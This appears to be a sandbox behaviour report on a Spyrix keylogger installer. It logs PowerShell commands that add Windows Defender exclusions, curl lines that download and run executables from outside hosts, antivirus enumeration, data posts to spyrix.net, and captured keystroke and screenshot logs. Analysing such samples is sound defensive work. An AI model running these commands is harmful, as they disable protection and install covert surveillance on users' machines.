Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\tasklist.exe	Process token adjusted: Debug

Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe

Code function: 67_2_00D1119B SetUnhandledExceptionFilter,__p__acmdln,malloc,strlen,malloc,memcpy,__initenv,_cexit,_amsg_exit,_initterm,exit,

67_2_00D1119B

Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe

Memory allocated: page read and write | page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Adds a directory exclusion to Windows Defender

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\181531736511434'"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\curl.exe curl.exe --insecure -o "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe" https://filedn.com/lHeD6Etwo8g0FE5cMVwEMkH/56ysdvbdckuh27dqLygst354csjnd/404	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe "C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe"	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe Remove-MpPreference -exclusionPath "C:\Users\user\AppData\Local\Temp\181531736511434"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\181531736511434\[space]= .exe	Process created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /c C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\\eb90c874-90f1-477e-bf8d-92cb4599bdb5.cmd	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe reg query "HKU\S-1-5-19\Environment"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath "'C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5'"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\l" https://cdnbaynet.com/loader/link.php?prg_id=sfk	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\curl.exe curl.exe --insecure --user-agent "sfk-dst-loader-2.0" -o "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe" https://swtb-download.spyrix-sfk.com/download/sfk/sfk_setup.exe	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe "C:\Users\user\AppData\Local\Temp\eb90c874-90f1-477e-bf8d-92cb4599bdb5\[space]= .exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\plist.vbs"
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\dashboard.cmd" "
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c "wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\wbem\WMIC.exe wmic /Node:localhost /Namespace:\\root\SecurityCenter2 Path AntiVirusProduct Get displayName /value
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess '[space]= .*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\*'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -exclusionPath 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\sps.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe add-mpPreference -ExclusionProcess 'C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe'
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\reg.exe reg export "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths" "C:\Users\user\AppData\Local\Temp\is-SI68G.tmp\ex" /y
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_StartButton_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Monitoring_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_Run_First_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spmm.exe" "Spyrix Free Keylogger 11.6.22"
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe "C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\qrl.exe" --insecure -d @app_wizard_Start_EE7E4705DD4AC06ADFE650C2CDC39BDD https://spyrix.net/dashboard/prg-actions
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\spkl.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c plist.cmd
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\chcp.com chcp 65001
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 20
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 83
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 112
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 121
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 114
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 105
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\cmd.exe cmd /c exit 120
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spm.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spm"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq sem.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "sem"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq spkl.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "spkl"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\tasklist.exe TASKLIST /FI "IMAGENAME eq clv.exe" /FO CSV /NH
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\find.exe find "clv"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: unknown unknown
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\timeout.exe timeout 6
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://dashboard.spyrix.com/
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\NETSTAT.EXE netstat.exe -e

Uses taskkill to terminate processes

Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe
Source: C:\Users\user\AppData\Local\Temp\is-PQ3FT.tmp\[space]= .tmp	Process created: C:\Windows\SysWOW64\taskkill.exe "C:\Windows\system32\taskkill.exe" /IM cmd.exe /IM wlg.exe /IM spmm.exe /IM spkl.exe /IM spm.exe /IM sem.exe /IM clv.exe /IM akl.exe /IM sps.exe /IM sime64.exe /IM ff.exe /IM mrec.exe /IM clvhost.exe /IM ffws.exe /F

Source: spkl.exe, 00000035.00000002.2989667203.00000000086D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000450A000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2977775602.0000000006621000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000035.00000003.2911483610.0000000007717000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:12:00.152{"sTime":"2024-10-02 00:12:00.152","sdTime":"45567.0083350926","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2971872040.000000000455D000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.0000000004556000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000035.00000002.2977775602.00000000065BD000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: s{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: APP;45567.0081901505;explorer.exe;Program Manager;;user
Source: spkl.exe, 00000035.00000002.2980946676.0000000006C57000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program Manager
Source: spkl.exe, 00000035.00000002.2933829318.0000000000A84000.00000040.00000001.01000000.00000014.sdmp	Binary or memory string: @@DOF_PROGMAN
Source: spkl.exe, 00000035.00000002.2971872040.00000000044A0000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}]}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: :"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}":"31"}
Source: spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2984263146.0000000007716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: )2024-10-02 00:12:01.027{"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000035.00000002.2958710472.0000000001910000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}rSystem";
Source: spkl.exe, 00000035.00000002.2977582430.0000000004FD0000.00000004.10000000.00040000.00000000.sdmp	Binary or memory string: {"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":[{"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:11:49.129","sEvent":"SCREENSHOT","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:49.973","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","sUser":"user"},{"sTime":"2024-10-02 00:11:56.614","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger 11.6.22","sUser":"user"},{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"}]}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:11:49.129","sEvent":"SCREENSHOT","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:49.973","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","sUser":"user"},{"sTime":"2024-10-02 00:11:56.614","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger 11.6.22","sUser":"user"},{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"},zyzzzzzzzyzzzzz\|zzzzec)"
Source: spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: Program ManagerQd
Source: spkl.exe, 00000035.00000002.2977775602.0000000006520000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2989667203.00000000086D0000.00000004.00001000.00020000.00000000.sdmp, spkl.exe, 00000035.00000002.2971872040.000000000450A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}
Source: spkl.exe, 00000035.00000003.2911483610.0000000007717000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:00.152","sdTime":"45567.0083350926","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: i{"keyboard":"","clipboard":"","url":"","app":"explorer.exe","title":"Program Manager","log":"LOG10ENTRY"}xe;P)
Source: spkl.exe, 00000035.00000002.2974675344.0000000004D2B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: ime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000035.00000002.2974675344.0000000004DA7000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: [{"sTime":"2024-10-02 00:11:31.349","sEvent":"ACTIVITY","SValue":"Start of User Session","sUser":"user","Reserved6":"51"},{"sTime":"2024-10-02 00:11:42.710","sEvent":"APP","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","sUser":"user"},{"sTime":"2024-10-02 00:11:45.491","sEvent":"SCREENSHOT","SApp":"chrome.exe","sTitle":"Welcome Back - Google Chrome","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:47.629","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:11:49.129","sEvent":"SCREENSHOT","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","SValue":"Window Change","sUser":"user","Reserved6":"31"},{"sTime":"2024-10-02 00:11:49.973","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger - Settings Wizard","sUser":"user"},{"sTime":"2024-10-02 00:11:56.614","sEvent":"APP","SApp":"spkl.exe","sTitle":"Spyrix Free Keylogger 11.6.22","sUser":"user"},{"sTime":"2024-10-02 00:12:00.152","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user"},{"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}]t 465)"
Source: spkl.exe, 00000035.00000002.2971872040.0000000004501000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: {"sTime":"2024-10-02 00:12:01.027","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","Reserved6":"31"}."Q\|P
Source: spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2912003714.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2904729142.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: G2024-10-02 00:12:00.152{"sTime":"2024-10-02 00:12:00.152","sdTime":"45567.0083350926","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2984263146.0000000007716000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: 24-10-02 00:12:01.027{"sTime":"2024-10-02 00:12:01.027","sdTime":"45567.0083452199","sEvent":"SCREENSHOT","SApp":"explorer.exe","sTitle":"Program Manager","SValue":"Window Change","sUser":"user","SNode":"1-3","Reserved6":"31"}
Source: spkl.exe, 00000035.00000002.2971872040.000000000457B000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SSCREENSHOT;45567.0083452199;explorer.exe;Program Manager;ID: 31 Window Change;user?"
Source: spkl.exe, 00000035.00000003.2794463568.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2880916948.00000000077F1000.00000004.00000020.00020000.00000000.sdmp, spkl.exe, 00000035.00000003.2913890617.00000000077F1000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: G2024-10-02 00:11:47.629{"sTime":"2024-10-02 00:11:47.629","sdTime":"45567.0081901505","sEvent":"APP","SApp":"explorer.exe","sTitle":"Program Manager","sUser":"user","SNode":"1-1"}
Source: spkl.exe, 00000035.00000002.2977775602.000000000652A000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: SCREENSHOT;45567.0082075116;explorer.exe;Program Manager;ID(
